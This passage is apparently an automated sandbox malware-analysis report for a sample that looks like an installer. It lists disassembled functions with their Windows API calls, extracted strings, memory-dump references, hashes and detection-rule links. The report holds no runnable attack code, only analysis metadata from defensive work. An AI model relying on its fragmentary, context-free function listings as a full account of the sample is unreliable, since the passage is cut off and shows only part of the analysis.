                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4025006896-0
                                                                                                                            • Opcode ID: f5329bc195fe8fc87e14c8434c73e300a75752ca243df2a436e9fb21fcb0b6a1
                                                                                                                            • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                                            • Opcode Fuzzy Hash: f5329bc195fe8fc87e14c8434c73e300a75752ca243df2a436e9fb21fcb0b6a1
                                                                                                                            • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D010 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                            • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                                            • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                            • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004705A0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                                            Strings
                                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                                            • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                            • API String ID: 1452528299-3038984924
                                                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046FDF4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                                            Strings
                                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                            • API String ID: 1452528299-1392080489
                                                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455D9C Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4283692357-0
                                                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047CD48 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2227064392-0
                                                                                                                            • Opcode ID: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                                            • Opcode Fuzzy Hash: e13c2d2b335e86ebcf447858ec8845d31b72a910f84188e90b50ee4c4f03f4e8
                                                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478204 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 215268677-0
                                                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00424240 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                                            • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                                            • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2280970139-0
                                                                                                                            • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                            • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                                            • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                            • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047A218 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                                            Strings
                                                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                                            • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                            • API String ID: 3535843008-1938159461
                                                                                                                            • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                            • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                                            • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                            • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048358C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                                            • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                                            Strings
                                                                                                                            • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveForeground
                                                                                                                            • String ID: Will not restart Windows automatically.
                                                                                                                            • API String ID: 307657957-4169339592
                                                                                                                            • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                            • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                                            • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                            • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004763AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                                            • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                                            Strings
                                                                                                                            • Extracting temporary file: , xrefs: 004763EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileTime$Local
                                                                                                                            • String ID: Extracting temporary file:
                                                                                                                            • API String ID: 791338737-4171118009
                                                                                                                            • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                            • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                                            • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                            • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CC0C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                            • API String ID: 0-1974262853
                                                                                                                            • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                            • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                                            • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                            • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478E98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                                            • %s\%s_is1, xrefs: 00478F10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                            • API String ID: 47109696-1598650737
                                                                                                                            • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                            • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                                            • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                            • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00450168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
